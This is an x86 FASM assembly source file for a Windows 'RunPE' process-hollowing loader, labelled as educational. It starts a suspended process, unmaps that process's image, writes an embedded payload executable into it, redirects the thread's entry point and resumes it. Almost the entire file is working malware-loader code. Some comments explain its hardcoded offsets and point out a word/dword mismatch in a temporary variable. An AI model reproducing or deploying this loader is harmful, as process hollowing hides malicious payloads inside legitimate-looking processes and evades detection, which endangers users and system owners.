;BASIC FASM RUNPE - "process hollowing" loader: starts a suspended child, unmaps its image,
;writes a PE32 image from this process into it and resumes it at the new entry point.
;32-bit Windows, FASM (Intel syntax), stdcall Win32/Native API. No relocation support.
;CODED BY ARMITAGE FOR EDUCATIONAL PURPOSE ONLY
  3.  
  4. format PE GUI 4.0
  5. entry start
  6. include "INCLUDE\WIN32A.INC"
  7.  
  8. section ".text" code executable readable
  9.  
  10.   start:
  11.  
  12.     push PROCESSINFORMATION
  13.     push STARTUP_INFO
  14.     push 0
  15.     push 0
  16.     push CREATE_SUSPENDED
  17.     push 0
  18.     push 0
  19.     push 0
  20.     push TargetProcess
  21.     push 0
  22.     call [CreateProcessA]
  23.     mov dword [CONTEXT], 10002h         ;Set CONTEXT.ContextFlags
  24.     push CONTEXT
  25.     push dword [PROCESSINFORMATION+4]   ;PROCESS_INFORMATION.hThread
  26.     call [GetThreadContext]
  27.     cmp eax, 0
  28.     je ExitProcess
  29.     mov eax, dword [CONTEXT+0A4h]   ;CONTEXT.EBX
  30.     add eax, 8                      ;PEB ADDRESS
  31.     push 0
  32.     push 4
  33.     push BASEADDRESS
  34.     push eax
  35.     push dword [PROCESSINFORMATION]
  36.     call [ReadProcessMemory]
  37.     push dword [BASEADDRESS]
  38.     push dword [PROCESSINFORMATION]
  39.     call [NtUnmapViewOfSection]
  40.     mov eax, dword [DataPtr]
  41.     mov ebx, eax
  42.     mov ax, word [eax]
  43.     cmp ax, 5A4Dh
  44.     jne ExitProcess
  45.     mov eax, dword [ebx+3Ch]     ;IMAGE_DOS_HEADER.e_lfanew
  46.     add eax, ebx
  47.     mov esi, eax                     ;Saving the pointer
  48.     mov eax, dword [eax]
  49.     cmp eax, 4550h
  50.     jne ExitProcess
  51.     mov ax, word [esi+6h]
  52.     mov word [NUMBEROFSECTIONS], ax
  53.     mov eax, dword [esi+34h]
  54.     mov dword [IMAGEBASE], eax
  55.     cmp eax, dword [BASEADDRESS]
  56.     jne ExitProcess
  57.     mov eax, dword [esi+50h]
  58.     mov dword [SIZEOFIMAGE], eax
  59.     mov eax, dword [esi+54h]
  60.     mov dword [SIZEOFHEADERS], eax
  61.     add esi, 0F8h
  62.     mov dword [SECTIONHEADER_PTR], esi
  63.     push PAGE_EXECUTE_READWRITE
  64.     push MEM_COMMIT or MEM_RESERVE
  65.     push dword [SIZEOFIMAGE]
  66.     push dword [IMAGEBASE]
  67.     push dword [PROCESSINFORMATION]
  68.     call [VirtualAllocEx]
  69.     push RETURN
  70.     push dword [SIZEOFHEADERS]
  71.     push dword [DataPtr]
  72.     push eax                           ;VirtualAllocEx returned value
  73.     push dword [PROCESSINFORMATION]
  74.     call [WriteProcessMemory]          ;WRITE IMAGE_NT_HEADERS
  75.     mov ecx, 0
  76.     mov edi, 28h
  77.  
  78.     WriteSections:
  79.  
  80.     mov eax, dword [SECTIONHEADER_PTR]
  81.     mov esi, eax                     ;We save the pointer into ESI
  82.  
  83.     add eax, 0Ch
  84.     mov dword [rTemp], eax
  85.     mov eax, ecx
  86.     mul edi
  87.     mov edx, dword [rTemp]
  88.     add edx, eax
  89.     mov eax, dword [edx]
  90.     add eax, dword [IMAGEBASE]       ;IMAGE_SECTION_HEADER[i].VirtualAddress + IMAGEBASE
  91.     mov dword [rTemp], eax           ;Save the value
  92.  
  93.     mov ebx, esi                     ;We save the pointer into EBX
  94.     add esi, 10h
  95.     mov eax, ecx
  96.     mul edi
  97.     add esi, eax
  98.     mov esi, dword [esi]             ;IMAGE_SECTION_HEADER[i].SizeOfRawData
  99.     mov dword [rTemp2], esi
  100.  
  101.     add ebx, 14h
  102.     mov eax, ecx
  103.     mul edi
  104.     add ebx, eax
  105.     mov eax, dword [ebx]             ;IMAGE_SECTION_HEADERS[i].PointerToRawData
  106.     add eax, dword [DataPtr]
  107.  
  108.     mov word [ecxtemp], ecx
  109.  
  110.     push RETURN
  111.     push dword [rTemp2]              ;IMAGE_SECTION_HEADERS[1].SizeOfRawData
  112.     push eax                         ;IMAGE_SECTION_HEADERS[i].PointerToRawData
  113.     push dword [rTemp]               ;IMAGE_SECTION_HEADERS[i].VirtualAddress + IMAGEBASE
  114.     push dword [PROCESSINFORMATION]  ;PROCESS_INFORMATION.hProcess
  115.     call [WriteProcessMemory]
  116.  
  117.     mov ecx, dword [ecxtemp]
  118.  
  119.     inc ecx
  120.     cmp cx, word [NUMBEROFSECTIONS]
  121.     jne WriteSections
  122.  
  123.     mov eax, dword [CONTEXT+0A4h]   ;CONTEXT.EBX
  124.     add eax, 8
  125.  
  126.     push 0
  127.     push 4
  128.     push BASEADDRESS
  129.     push eax
  130.     push dword [PROCESSINFORMATION]
  131.     call [WriteProcessMemory]
  132.  
  133.     mov eax, dword [DataPtr]
  134.     mov eax, dword [eax+3Ch]      ;IMAGE_DOS_HEADER.e_lfanew
  135.     add eax, dword [DataPtr]
  136.     mov eax, dword [eax+28h]      ;OptionalHeader.AddressOfEntryPoint
  137.     add eax, dword [IMAGEBASE]    ;It's not relative now :)
  138.     mov dword [CONTEXT+0B0h], eax
  139.     push CONTEXT
  140.     push dword [PROCESSINFORMATION+4]
  141.     call [SetThreadContext]
  142.     push dword [PROCESSINFORMATION+4]
  143.     call [ResumeThread]
  144.     push 0
  145.     call [Exit_Process]
  146.  
  147.  
  148. ExitProcess:
  149.    push 0
  150.    push dword [PROCESSINFORMATION]
  151.    call [TerminateProcess]
  152.    push dword [PROCESSINFORMATION+4]  ;PROCESS_INFORMATION.hThread
  153.    call [CloseHandle]
  154.    push dword [PROCESSINFORMATION]   ;PROCESS_INFORMATION.hProcess
  155.    call [CloseHandle]
  156.    push 0
  157.    call [Exit_Process]
  158.  
  159. section ".data" data readable writable
  160.  
  ; Path of the executable to create suspended and hollow. Absolute and
  ; machine-specific: it must exist on the host where this binary runs.
  TargetProcess db 'C:\Users\XNXX.COM(lol)\Desktop\Coding\FASM IDE\RunPE.exe', 0
  ; Virtual address, in THIS process, of the PE32 image to run in the child.
  ; It is a fixed number rather than a label, so it is only valid while the
  ; payload really sits at that VA in the built executable - re-check it
  ; whenever the image layout changes.
  DataPtr       dd 0x405058 ;write here the VA of your payload
  163.  
  164.  
  165.  
  166.  
  167. section ".bss" readable writable
  168.  
  169.   ;WE WILL USE BSS SEGMENT INSTEAD OF STRUCTURES :)
  ; Scratch storage; only reserved (no initialised bytes in the image), so it
  ; is expected to be zero-filled at load time.
  ; Raw buffers stand in for the Win32 structures and the code indexes them
  ; with hard-coded offsets (PROCESSINFORMATION+4 = hThread, CONTEXT+0A4h = Ebx,
  ; CONTEXT+0B0h = Eax), so the sizes and the order below must not change.
  ;WE WILL USE BSS SEGMENT INSTEAD OF STRUCTURES :)
  PROCESSINFORMATION rb 10h     ; PROCESS_INFORMATION: hProcess, hThread, dwProcessId, dwThreadId
  STARTUP_INFO rb 44h           ; STARTUPINFOA; never written by the visible code (cb stays 0)
  CONTEXT rb 2CCh               ; x86 CONTEXT
  BASEADDRESS rd 1              ; child's PEB.ImageBaseAddress, read from the child
  RETURN rd 1                   ; lpNumberOfBytesWritten sink for WriteProcessMemory
  IMAGEBASE rd 1                ; payload OptionalHeader.ImageBase
  SIZEOFIMAGE rd 1              ; payload OptionalHeader.SizeOfImage
  SIZEOFHEADERS rd 1            ; payload OptionalHeader.SizeOfHeaders
  NUMBEROFSECTIONS rw 1         ; payload FileHeader.NumberOfSections
  SECTIONHEADER_PTR rd 1        ; first IMAGE_SECTION_HEADER of the payload (this process)
  rTemp rd 1                    ; WriteSections temporaries
  rTemp2 rd 1
  ecxtemp rw 1                  ; NOTE(review): 16-bit slot, but WriteSections stores
                                ; ECX into it as a word and reloads it as a dword -
                                ; the operand sizes do not match
  183.  
  184. section ".idata" import data readable writeable
  185.  
  ; Import table. Every API used by .text is called through these IAT
  ; entries ([CreateProcessA], [WriteProcessMemory], ...).
  library kernel,"KERNEL32.DLL",\
          ntdll,"NTDLL.DLL"
  ; kernel32!ExitProcess is imported under the alias Exit_Process because
  ; ExitProcess is already used as a code label in .text.
  import kernel,\
         CreateProcessA, "CreateProcessA",\
         GetThreadContext, "GetThreadContext",\
         SetThreadContext, "SetThreadContext",\
         VirtualAllocEx, "VirtualAllocEx",\
         ReadProcessMemory, "ReadProcessMemory",\
         WriteProcessMemory, "WriteProcessMemory",\
         ResumeThread, "ResumeThread",\
         CloseHandle, "CloseHandle",\
         TerminateProcess, "TerminateProcess",\
         Exit_Process,"ExitProcess"
  ; Native API (ntdll), not part of the documented Win32 surface; it is what
  ; removes the child's original image mapping before the new one is written.
  import ntdll,\
         NtUnmapViewOfSection, "NtUnmapViewOfSection"